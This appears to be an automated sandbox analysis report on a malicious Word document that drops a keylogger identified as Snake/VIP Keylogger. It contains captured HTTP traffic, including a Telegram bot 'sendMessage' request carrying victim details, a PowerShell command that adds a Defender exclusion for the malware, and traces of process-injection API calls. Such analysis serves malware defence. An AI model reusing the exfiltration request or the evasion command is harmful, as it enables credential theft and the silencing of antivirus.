                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20497
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OSXfXVUWdrqbVXyDvAvJ97TlU1aUoaqy3CkevdDqe%2BbAgcj5GcsRV39E3gTZViY8GB%2FRnzuGCe44LYlepD6ZqTWfYbKJBaZk6%2ByyOJZYNH4kzSzosXE9R45YPP88zD4ApdmprF6I"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da99bf74adf2847-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1364&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2118507&cwnd=251&unsent_bytes=0&cid=9459484159561db7&ts=148&x=0"
                                                                                                          2024-10-30 07:14:34 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.2249174188.114.97.34433576C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:14:36 UTC63OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2024-10-30 07:14:36 UTC895INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:36 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20499
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IqgXvX%2FsJ9bTJ%2FTPRj4V%2B7xqkqfuuxqAKqhLwgmdz4Pq5Y1D0Uy31s4F8c5sdMP7Agx6hYFaPTLs1R%2FvQGaNxK6YWk3%2FDWAd%2B1CnhQatAZspASIhw1%2FDujlU9SOJadmhEiaIQf%2BL"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da99c02edd10b8a-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1636&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1788758&cwnd=250&unsent_bytes=0&cid=4bcbaf548454c2a1&ts=159&x=0"
                                                                                                          2024-10-30 07:14:36 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.2249176188.114.96.34433576C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:14:38 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-10-30 07:14:38 UTC887INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:38 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20501
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZNfwlRSLbkM3eixbxdEr82ooJxAzUV2OTtnSHyT5A%2BrXBrMytxvAXYlVI3CyZHMcPi7SYLfA2pLFyXLqEDPmpYPP7fl%2FkZaH1pPlZGg97gOc%2FNj%2FpxZ1GocdnUaUE5GnkBGhrjVv"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da99c0daaaf0072-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1516&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1892810&cwnd=251&unsent_bytes=0&cid=5769ab7e5656329e&ts=148&x=0"
                                                                                                          2024-10-30 07:14:38 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.2249178188.114.97.34433576C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:14:39 UTC63OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2024-10-30 07:14:40 UTC889INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:40 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20503
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XB3BDVi6QIGkIU9Ed65GAa32qunHnqoo8gOkpIBS%2F4UZ%2FeL0PfAdJQRtBtcF4YAzlCg7oDbK9RahqL%2FJ3pWnHotxpxmGtfNiMpHkyL78Ktasuske9ipEo%2BPqIp%2BHfzUGoFbXCZpb"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da99c181cbee722-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1340&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2093998&cwnd=249&unsent_bytes=0&cid=7c6ee2d2bb937d04&ts=147&x=0"
                                                                                                          2024-10-30 07:14:40 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          7192.168.2.2249180188.114.97.34433576C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:14:42 UTC87OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-10-30 07:14:42 UTC882INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:42 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20505
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J5WL5y6K79MMszhxRWOMcnnRNbnTDtnUPHOe9Dz0qrlcD%2B8SH6Czw8QIfRhuOrSFW1I18MwpB0Eb1isYUayl76OXQzf8WzarHuwbNnKZtGXzQ9UqAL3Afk2NqGEtt3TXZM5aC09D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da99c28cc556b97-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1233&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2283911&cwnd=251&unsent_bytes=0&cid=514359f8a2f39fcb&ts=1088&x=0"
                                                                                                          2024-10-30 07:14:42 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          8192.168.2.2249182188.114.97.34433576C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:14:44 UTC63OUTGET /xml/173.254.250.78 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          2024-10-30 07:14:44 UTC885INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 30 Oct 2024 07:14:44 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 359
                                                                                                          Connection: close
                                                                                                          apigw-requestid: AcLvmhW3vHcESEw=
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          CF-Cache-Status: HIT
                                                                                                          Age: 20507
                                                                                                          Last-Modified: Wed, 30 Oct 2024 01:32:57 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fp2RNbfNLnmMK8Msfpw%2Bz2DziaDDYadV4NR7Em9GoNdN4olgxSFWyMIF6%2FbXQ%2B4o7O8alBqjUYHyOKsRrkgZY6NgbYj1a60bHJ4d00miN95pGY25eoRS1gu7XUTHsUOr9y9qt5AO"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8da99c33ae7f359f-DFW
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1174&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2427493&cwnd=243&unsent_bytes=0&cid=cb74297ddce064fd&ts=145&x=0"
                                                                                                          2024-10-30 07:14:44 UTC359INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
                                                                                                          Data Ascii: <Response><IP>173.254.250.78</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.2249183149.154.167.2204433576C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-10-30 07:14:45 UTC353OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2010/30/2024%20/%207:45:32%20PM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                          Host: api.telegram.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2024-10-30 07:14:45 UTC344INHTTP/1.1 404 Not Found
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Wed, 30 Oct 2024 07:14:45 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 55
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2024-10-30 07:14:45 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                          Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                          Statistics

                                                                                                          CPU Usage

                                                                                                          Click to jump to process

                                                                                                          Memory Usage

                                                                                                          Click to jump to process

                                                                                                          High Level Behavior Distribution

                                                                                                          Click to dive into process behavior distribution

                                                                                                          Behavior

                                                                                                          Click to jump to process

                                                                                                          System Behavior

                                                                                                          General

                                                                                                          Target ID:0
                                                                                                          Start time:03:14:13
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                          Wow64 process (32bit):false
                                                                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                          Imagebase:0x13f0e0000
                                                                                                          File size:1'423'704 bytes
                                                                                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          General

                                                                                                          Target ID:2
                                                                                                          Start time:03:14:14
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                          Imagebase:0x400000
                                                                                                          File size:543'304 bytes
                                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:5
                                                                                                          Start time:03:14:19
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe"
                                                                                                          Imagebase:0xb00000
                                                                                                          File size:756'736 bytes
                                                                                                          MD5 hash:53A7577C1DE37E54A78A2B918EB0D8BB
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.414699470.00000000039A7000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                          Antivirus matches:
                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                          Reputation:low
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:6
                                                                                                          Start time:03:14:24
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe"
                                                                                                          Imagebase:0xd10000
                                                                                                          File size:427'008 bytes
                                                                                                          MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:true

                                                                                                          General

                                                                                                          Target ID:8
                                                                                                          Start time:03:14:24
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\cmnjgyugo61000.exe"
                                                                                                          Imagebase:0xb00000
                                                                                                          File size:756'736 bytes
                                                                                                          MD5 hash:53A7577C1DE37E54A78A2B918EB0D8BB
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Yara matches:
                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.908152550.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                          • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000008.00000002.908507517.0000000002301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                          Reputation:low
                                                                                                          Has exited:false

                                                                                                          General

                                                                                                          Target ID:9
                                                                                                          Start time:03:14:39
                                                                                                          Start date:30/10/2024
                                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                          Wow64 process (32bit):true
                                                                                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                          Imagebase:0x400000
                                                                                                          File size:543'304 bytes
                                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                          Has elevated privileges:true
                                                                                                          Has administrator privileges:true
                                                                                                          Programmed in:C, C++ or other language
                                                                                                          Reputation:high
                                                                                                          Has exited:false

                                                                                                          Disassembly

                                                                                                          Reset < >

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:15%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:2.8%
                                                                                                            Total number of Nodes:109
                                                                                                            Total number of Limit Nodes:2
                                                                                                            execution_graph 10555 5f335d 10556 5f3111 10555->10556 10557 5f31cc 10556->10557 10559 5f3fc0 10556->10559 10560 5f3fda 10559->10560 10568 5f3ffe 10560->10568 10573 5f477e 10560->10573 10578 5f49a1 10560->10578 10583 5f440a 10560->10583 10590 5f48cb 10560->10590 10595 5f448c 10560->10595 10603 5f4910 10560->10603 10607 5f4733 10560->10607 10611 5f4535 10560->10611 10615 5f4a59 10560->10615 10620 5f495b 10560->10620 10625 5f49fb 10560->10625 10568->10557 10574 5f48cf 10573->10574 10630 5f29b8 10574->10630 10634 5f29b0 10574->10634 10575 5f48f1 10575->10568 10579 5f49a7 10578->10579 10638 5f2858 10579->10638 10642 5f2851 10579->10642 10580 5f49dc 10580->10568 10646 5f2bf0 10583->10646 10584 5f443a 10585 5f4477 10584->10585 10587 5f2858 WriteProcessMemory 10584->10587 10588 5f2851 WriteProcessMemory 10584->10588 10585->10568 10586 5f4d69 10587->10586 10588->10586 10591 5f48cf 10590->10591 10593 5f29b8 ReadProcessMemory 10591->10593 10594 5f29b0 ReadProcessMemory 10591->10594 10592 5f48f1 10592->10568 10593->10592 10594->10592 10650 5f21c8 10595->10650 10654 5f21c1 10595->10654 10596 5f4477 10596->10568 10597 5f4465 10597->10596 10599 5f2858 WriteProcessMemory 10597->10599 10600 5f2851 WriteProcessMemory 10597->10600 10598 5f4d69 10599->10598 10600->10598 10658 5f22f8 10603->10658 10662 5f22f0 10603->10662 10604 5f492e 10608 5f4739 10607->10608 10666 5f20d8 10608->10666 10613 5f2858 WriteProcessMemory 10611->10613 10614 5f2851 WriteProcessMemory 10611->10614 10612 5f44f6 10612->10568 10613->10612 10614->10612 10616 5f49b8 10615->10616 10617 5f49dc 10615->10617 10618 5f2858 WriteProcessMemory 10616->10618 10619 5f2851 WriteProcessMemory 10616->10619 10617->10568 10618->10617 10619->10617 10621 5f48e1 10620->10621 10622 5f48f1 10620->10622 10621->10622 10623 5f29b8 ReadProcessMemory 10621->10623 10624 5f29b0 ReadProcessMemory 10621->10624 10622->10568 10623->10622 10624->10622 10626 5f474a 10625->10626 10627 5f4a08 10625->10627 10629 5f20d8 ResumeThread 10626->10629 